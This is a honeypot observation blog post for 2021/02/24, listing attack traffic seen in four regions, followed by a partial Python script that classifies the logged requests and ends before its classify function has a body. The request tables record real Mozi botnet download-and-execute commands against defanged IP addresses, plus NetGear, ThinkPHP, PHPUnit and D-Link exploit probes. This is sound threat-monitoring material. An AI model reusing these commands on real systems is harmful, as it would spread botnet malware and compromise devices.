コンニチハレバレトシタアオゾラ

With nothing much to do, I spend the whole day facing my blog, jotting down at random whatever trifles drift through my mind,

2021/02/24 Honeypot (tentative) observation log

This is the honeypot (tentative) observation log for 2021/02/24.

Features
Common

Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Scanning for Apache Solr
Scanning for Laravel
Scanning for WordPress plugins

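Location:JP

The following were observed:

Access targeting GPON router vulnerabilities
Access targeting vulnerabilities in NetGear products
Access targeting ThinkPHP vulnerabilities
Scanning by IDBTE4M CODE87
Scanning by zgrab
Access with the UserAgent "Hello, World"
Access with the UserAgent "Hello, world"

The following access to /shell was observed: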

cd /tmp;
rm -rf *;
wget http[:]//117[.]247[.]203[.]40:57188/Mozi.a;
chmod 777 Mozi.a;
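/tmp/Mozi.a jaws

Location:US

The following were observed:

Access targeting GPON router vulnerabilities
Access targeting vulnerabilities in NetGear products
Access attempting DNS hijacking against D-link products
Scanning by IDBTE4M CODE87
Scanning by zgrab
Scanning for WordPress
Scanning for /[a-z0-9]\.(gz|tar|tar.bz2|txt|zip)
Unauthorized communication involving 110[.]242[.]68[.]4
Access with the UserAgent "Hello, world"

The following access to /shell was observed: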

cd /tmp;
rm -rf *;
wget http[:]//117[.]242[.]209[.]155:43376/Mozi.a;
chmod 777 Mozi.a;
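/tmp/Mozi.a jaws

Location:UK

The following were observed:

Access targeting GPON router vulnerabilities
Access targeting ThinkPHP vulnerabilities
Scanning by zgrab
Scanning for Apache Tomcat
Scanning for WordPress
Unauthorized communication involving 5[.]188[.]210[.]227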

Location:SG

The following were observed:

Access targeting vulnerabilities in NetGear products
Access targeting ThinkPHP vulnerabilities
Scanning for Apache Tomcat
Scanning for WordPress
Gh0stRAT-like behavior

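Access count trend

JP: total accesses: 153 (change from previous day: -3)
US: total accesses: 242 (change from previous day: +194)
UK: total accesses: 161 (change from previous day: +128)
SG: total accesses: 34 (change from previous day: -28)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.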

Location:JP

Source IP addresses


UserAgent list

Count UserAgent
14 -
1 Hello, World
1 Hello, world
1 IDBTE4M CODE87
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x
5 curl/7.61.1
1 python-requests/2.18.4

Request list

Count Method Request Protocol
3 -
1 \x03
1 \x16\x03\x01
2 \x16\x03\x01\x02
2 \xbf\xbf\xaf\xaf~
7 GET /.env HTTP/1.1
5 GET /.git/HEAD HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//182[.]127[.]28[.]11:54859/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//117[.]247[.]203[.]40:57188/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//httpbin[.]org/ip HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:US

Source IP addresses


UserAgent list

Count UserAgent
11 -
2 Go-http-client/1.1
1 Hello, world
1 IDBTE4M CODE87
181 Mozilla/5.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.15) Gecko/20101027 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.01732016 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 curl/7.58.0
2 curl/7.61.1

Request list

Count Method Request Protocol
1 -
2 \x16\x03\x01
1 \x16\x03\x01\x02
1 \xbf\xbf\xaf\xaf~
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
4 GET /.env HTTP/1.1
2 GET /.git/HEAD HTTP/1.1
1 GET /0.gz HTTP/1.1
1 GET /0.tar HTTP/1.1
1 GET /0.tar.bz2 HTTP/1.1
1 GET /0.txt HTTP/1.1
1 GET /0.zip HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /1.gz HTTP/1.1
1 GET /1.tar HTTP/1.1
1 GET /1.tar.bz2 HTTP/1.1
1 GET /1.txt HTTP/1.1
1 GET /1.zip HTTP/1.1
1 GET /2.gz HTTP/1.1
1 GET /2.tar HTTP/1.1
1 GET /2.tar.bz2 HTTP/1.1
1 GET /2.txt HTTP/1.1
1 GET /2.zip HTTP/1.1
1 GET /3.gz HTTP/1.1
1 GET /3.tar HTTP/1.1
1 GET /3.tar.bz2 HTTP/1.1
1 GET /3.txt HTTP/1.1
1 GET /3.zip HTTP/1.1
1 GET /4.gz HTTP/1.1
1 GET /4.tar HTTP/1.1
1 GET /4.tar.bz2 HTTP/1.1
1 GET /4.txt HTTP/1.1
1 GET /4.zip HTTP/1.1
1 GET /5.gz HTTP/1.1
1 GET /5.tar HTTP/1.1
1 GET /5.tar.bz2 HTTP/1.1
1 GET /5.txt HTTP/1.1
1 GET /5.zip HTTP/1.1
1 GET /6.gz HTTP/1.1
1 GET /6.tar HTTP/1.1
1 GET /6.tar.bz2 HTTP/1.1
1 GET /6.txt HTTP/1.1
1 GET /6.zip HTTP/1.1
1 GET /7.gz HTTP/1.1
1 GET /7.tar HTTP/1.1
1 GET /7.tar.bz2 HTTP/1.1
1 GET /7.txt HTTP/1.1
1 GET /7.zip HTTP/1.1
1 GET /8.gz HTTP/1.1
1 GET /8.tar HTTP/1.1
1 GET /8.tar.bz2 HTTP/1.1
1 GET /8.txt HTTP/1.1
1 GET /8.zip HTTP/1.1
1 GET /9.gz HTTP/1.1
1 GET /9.tar HTTP/1.1
1 GET /9.tar.bz2 HTTP/1.1
1 GET /9.txt HTTP/1.1
1 GET /9.zip HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /a.gz HTTP/1.1
1 GET /a.tar HTTP/1.1
1 GET /a.tar.bz2 HTTP/1.1
1 GET /a.txt HTTP/1.1
1 GET /a.zip HTTP/1.1
1 GET /b.gz HTTP/1.1
1 GET /b.tar HTTP/1.1
1 GET /b.tar.bz2 HTTP/1.1
1 GET /b.txt HTTP/1.1
1 GET /b.zip HTTP/1.1
1 GET /c.gz HTTP/1.1
1 GET /c.tar HTTP/1.1
1 GET /c.tar.bz2 HTTP/1.1
1 GET /c.txt HTTP/1.1
1 GET /c.zip HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /d.gz HTTP/1.1
1 GET /d.tar HTTP/1.1
1 GET /d.tar.bz2 HTTP/1.1
1 GET /d.txt HTTP/1.1
1 GET /d.zip HTTP/1.1
1 GET /dnscfg.cgi?dnsPrimary=192.95.59.130&dnsSecondary8.8.4.4&dnsDynamic=0&dnsRefresh=1 HTTP/1.1
1 GET /e.gz HTTP/1.1
1 GET /e.tar HTTP/1.1
1 GET /e.tar.bz2 HTTP/1.1
1 GET /e.txt HTTP/1.1
1 GET /e.zip HTTP/1.1
1 GET /f.gz HTTP/1.1
1 GET /f.tar HTTP/1.1
1 GET /f.tar.bz2 HTTP/1.1
1 GET /f.txt HTTP/1.1
1 GET /f.zip HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /g.gz HTTP/1.1
1 GET /g.tar HTTP/1.1
1 GET /g.tar.bz2 HTTP/1.1
1 GET /g.txt HTTP/1.1
1 GET /g.zip HTTP/1.1
1 GET /h.gz HTTP/1.1
1 GET /h.tar HTTP/1.1
1 GET /h.tar.bz2 HTTP/1.1
1 GET /h.txt HTTP/1.1
1 GET /h.zip HTTP/1.1
1 GET /i.gz HTTP/1.1
1 GET /i.tar HTTP/1.1
1 GET /i.tar.bz2 HTTP/1.1
1 GET /i.txt HTTP/1.1
1 GET /i.zip HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /j.gz HTTP/1.1
1 GET /j.tar HTTP/1.1
1 GET /j.tar.bz2 HTTP/1.1
1 GET /j.txt HTTP/1.1
1 GET /j.zip HTTP/1.1
2 GET /jenkins/login HTTP/1.0
1 GET /k.gz HTTP/1.1
1 GET /k.tar HTTP/1.1
1 GET /k.tar.bz2 HTTP/1.1
1 GET /k.txt HTTP/1.1
1 GET /k.zip HTTP/1.1
1 GET /l.gz HTTP/1.1
1 GET /l.tar HTTP/1.1
1 GET /l.tar.bz2 HTTP/1.1
1 GET /l.txt HTTP/1.1
1 GET /l.zip HTTP/1.1
2 GET /login HTTP/1.0
1 GET /m.gz HTTP/1.1
1 GET /m.tar HTTP/1.1
1 GET /m.tar.bz2 HTTP/1.1
1 GET /m.txt HTTP/1.1
1 GET /m.zip HTTP/1.1
2 GET /manager/html HTTP/1.1
1 GET /n.gz HTTP/1.1
1 GET /n.tar HTTP/1.1
1 GET /n.tar.bz2 HTTP/1.1
1 GET /n.txt HTTP/1.1
1 GET /n.zip HTTP/1.1
1 GET /o.gz HTTP/1.1
1 GET /o.tar HTTP/1.1
1 GET /o.tar.bz2 HTTP/1.1
1 GET /o.txt HTTP/1.1
1 GET /o.zip HTTP/1.1
1 GET /p.gz HTTP/1.1
1 GET /p.tar HTTP/1.1
1 GET /p.tar.bz2 HTTP/1.1
1 GET /p.txt HTTP/1.1
1 GET /p.zip HTTP/1.1
1 GET /q.gz HTTP/1.1
1 GET /q.tar HTTP/1.1
1 GET /q.tar.bz2 HTTP/1.1
1 GET /q.txt HTTP/1.1
1 GET /q.zip HTTP/1.1
1 GET /r.gz HTTP/1.1
1 GET /r.tar HTTP/1.1
1 GET /r.tar.bz2 HTTP/1.1
1 GET /r.txt HTTP/1.1
1 GET /r.zip HTTP/1.1
1 GET /s.gz HTTP/1.1
1 GET /s.tar HTTP/1.1
1 GET /s.tar.bz2 HTTP/1.1
1 GET /s.txt HTTP/1.1
1 GET /s.zip HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//116[.]75[.]194[.]194:38765/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//117[.]242[.]209[.]155:43376/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /t.gz HTTP/1.1
1 GET /t.tar HTTP/1.1
1 GET /t.tar.bz2 HTTP/1.1
1 GET /t.txt HTTP/1.1
1 GET /t.zip HTTP/1.1
1 GET /u.gz HTTP/1.1
1 GET /u.tar HTTP/1.1
1 GET /u.tar.bz2 HTTP/1.1
1 GET /u.txt HTTP/1.1
1 GET /u.zip HTTP/1.1
1 GET /v.gz HTTP/1.1
1 GET /v.tar HTTP/1.1
1 GET /v.tar.bz2 HTTP/1.1
1 GET /v.txt HTTP/1.1
1 GET /v.zip HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /w.gz HTTP/1.1
1 GET /w.tar HTTP/1.1
1 GET /w.tar.bz2 HTTP/1.1
1 GET /w.txt HTTP/1.1
1 GET /w.zip HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET /wp-login.php HTTP/1.1
1 GET /x.gz HTTP/1.1
1 GET /x.tar HTTP/1.1
1 GET /x.tar.bz2 HTTP/1.1
1 GET /x.txt HTTP/1.1
1 GET /x.zip HTTP/1.1
1 GET /xaa HTTP/1.1
1 GET /y.gz HTTP/1.1
1 GET /y.tar HTTP/1.1
1 GET /y.tar.bz2 HTTP/1.1
1 GET /y.txt HTTP/1.1
1 GET /y.zip HTTP/1.1
1 GET /z.gz HTTP/1.1
1 GET /z.tar HTTP/1.1
1 GET /z.tar.bz2 HTTP/1.1
1 GET /z.txt HTTP/1.1
1 GET /z.zip HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:UK

Source IP addresses


UserAgent list

Count UserAgent
15 -
107 Go-http-client/1.1
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Slackware Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.30 Safari/532.5
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x

Request list

Count Method Request Protocol
2 -
2 \x03
1 \x16\x03\x01
1 \x16\x03\x01\x02
1 \xbf\xbf\xaf\xaf~
1 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET //main.php HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /Dumper HTTP/1.1
1 GET /MSD HTTP/1.1
1 GET /MySQL HTTP/1.1
1 GET /MySQLDumper HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /SQLite-Manager/main.php HTTP/1.1
1 GET /SQLite/SQLite-Manager/main.php HTTP/1.1
1 GET /SQLite/SQLite-manager/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.0.4/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.0.5/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.0.6/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.1.0/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.1.1/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.1.2/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.1.3/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.2.0/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.2.2/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.2.3/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.2.4/main.php HTTP/1.1
1 GET /SQLite/SQLitemanager/main.php HTTP/1.1
1 GET /SQLite/sqlite-manager/main.php HTTP/1.1
1 GET /SQLite/sqlitemanager/main.php HTTP/1.1
1 GET /SQLiteManager-1.0.4/main.php HTTP/1.1
1 GET /SQLiteManager-1.0.5/main.php HTTP/1.1
1 GET /SQLiteManager-1.0.6/main.php HTTP/1.1
1 GET /SQLiteManager-1.1.0/main.php HTTP/1.1
1 GET /SQLiteManager-1.1.1/main.php HTTP/1.1
1 GET /SQLiteManager-1.1.2/main.php HTTP/1.1
1 GET /SQLiteManager-1.1.3/main.php HTTP/1.1
1 GET /SQLiteManager-1.2.0/main.php HTTP/1.1
1 GET /SQLiteManager-1.2.2/main.php HTTP/1.1
1 GET /SQLiteManager-1.2.3/main.php HTTP/1.1
1 GET /SQLiteManager-1.2.4/main.php HTTP/1.1
2 GET /SQLiteManager/main.php HTTP/1.1
1 GET /SQlite/main.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /admin-console/login.seam HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /db/main.php HTTP/1.1
1 GET /dbmanager/main.php HTTP/1.1
1 GET /dump HTTP/1.1
1 GET /dumper HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /hudson/login HTTP/1.1
1 GET /hudson/script HTTP/1.1
1 GET /index.php HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /invoker/JMXInvokerServlet HTTP/1.1
1 GET /jenkins HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /jenkins/login HTTP/1.0
1 GET /jenkins/script HTTP/1.1
1 GET /jmx-console/ HTTP/1.1
1 GET /login HTTP/1.1
1 GET /login HTTP/1.0
1 GET /manager/html HTTP/1.1
1 GET /manager/html/ HTTP/1.1
1 GET /manager/main.php HTTP/1.1
1 GET /msd HTTP/1.1
1 GET /msd1.21 HTTP/1.1
1 GET /msd1.24.4 HTTP/1.1
1 GET /msd1.24stable HTTP/1.1
1 GET /msddump HTTP/1.1
1 GET /msddumper HTTP/1.1
1 GET /msdump HTTP/1.1
1 GET /mySQLDumper HTTP/1.1
1 GET /mySQLmanager HTTP/1.1
1 GET /mySqlDumper HTTP/1.1
1 GET /mysql HTTP/1.1
1 GET /mysql/ HTTP/1.1
1 GET /mysqldump HTTP/1.1
1 GET /mysqldumper HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /script HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sql HTTP/1.1
1 GET /sql/main.php HTTP/1.1
1 GET /sqladmin HTTP/1.1
1 GET /sqlite-manager/main.php HTTP/1.1
1 GET /sqlite/SQLite-Manager/main.php HTTP/1.1
1 GET /sqlite/SQLite-manager/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.0.4/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.0.5/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.0.6/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.1.0/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.1.1/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.1.2/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.1.3/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.2.0/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.2.2/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.2.3/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.2.4/main.php HTTP/1.1
1 GET /sqlite/SQLitemanager/main.php HTTP/1.1
1 GET /sqlite/main.php HTTP/1.1
1 GET /sqlite/sqlite-manager/main.php HTTP/1.1
1 GET /sqlite/sqlitemanager/main.php HTTP/1.1
1 GET /sqlitemanager-1.0.4/main.php HTTP/1.1
1 GET /sqlitemanager-1.0.5/main.php HTTP/1.1
1 GET /sqlitemanager-1.0.6/main.php HTTP/1.1
1 GET /sqlitemanager-1.1.0/main.php HTTP/1.1
1 GET /sqlitemanager-1.1.1/main.php HTTP/1.1
1 GET /sqlitemanager-1.1.2/main.php HTTP/1.1
1 GET /sqlitemanager-1.1.3/main.php HTTP/1.1
1 GET /sqlitemanager-1.2.0/main.php HTTP/1.1
1 GET /sqlitemanager-1.2.2/main.php HTTP/1.1
1 GET /sqlitemanager-1.2.3/main.php HTTP/1.1
1 GET /sqlitemanager-1.2.4/main.php HTTP/1.1
2 GET /sqlitemanager/main.php HTTP/1.1
1 GET /sqlmanager HTTP/1.1
1 GET /sqlmanager/main.php HTTP/1.1
1 GET /sqlweb HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web-console/ HTTP/1.1
1 GET /websql HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:SG

Source IP addresses


UserAgent list

Count UserAgent
12 -
3 Go-http-client/1.1
2 Mozilla/5.0
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36

Request list

Count Method Request Protocol
1 Gh0st\xad
2 \x16\x03\x01\x02
1 \xbf\xbf\xaf\xaf~
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 CONNECT m[.]naver[.]com/:443 HTTP/1.1
1 CONNECT www[.]naver[.]com/:80 HTTP/1.1
2 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
3 GET /jenkins/login HTTP/1.0
3 GET /login HTTP/1.0
3 GET /manager/html HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
3 GET /wp-login.php HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
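
The categories in the summary at the top of this post can be derived mechanically from rows like the ones in the request tables. The following Python is an added example, not the blog author's tooling: the rule patterns, labels and function names are assumptions of this example, and the sample rows are copied from the tables in this post. It tags each row, totals the counts per category, and pulls the defanged download host out of Mozi `wget` strings, flagging private addresses and skipping unfilled `%s:%d` templates.

```python
import ipaddress
import re
from collections import Counter

# Labels follow the post's summary; the patterns are this example's assumptions.
RULES = [
    ("NetGear setup.cgi", re.compile(r"^GET /setup\.cgi\?.*todo=syscmd")),
    ("ThinkPHP", re.compile(r"think\\app/invokefunction")),
    ("PHPUnit CVE-2017-9841", re.compile(r"/phpunit/src/Util/PHP/eval-stdin\.php")),
    ("Archive-name scan", re.compile(r"^GET /[a-z0-9]\.(gz|tar|tar\.bz2|txt|zip) ")),
    ("Proxy-style request", re.compile(r"^CONNECT |^(GET|HEAD) http\[:\]//")),
    ("TLS handshake record", re.compile(r"^\\x16\\x03")),
    ("Gh0st-like", re.compile(r"^Gh0st")),
    ("Mozi downloader", re.compile(r"wget.*Mozi\.[am]")),
]
# Defanged download URL as written in the tables: http[:]//a[.]b[.]c[.]d:port/Mozi.x
DROP_URL = re.compile(r"http\[:\]//([0-9.\[\]]+):(\d+)/Mozi\.[am]")

# Sample rows copied from the request tables in this post (still defanged).
SAMPLE = r"""
2 \x16\x03\x01\x02
1 Gh0st\xad
1 GET /0.tar.bz2 HTTP/1.1
1 GET /0bef HTTP/1.0
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//117[.]247[.]203[.]40:57188/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
""".strip().splitlines()


def parse_row(row):
    """Split one 'count request-line' row as laid out in the request tables."""
    count, _, request = row.strip().partition(" ")
    return int(count), request


def classify(request):
    """Return every matching label: one request can be both a vector and a payload."""
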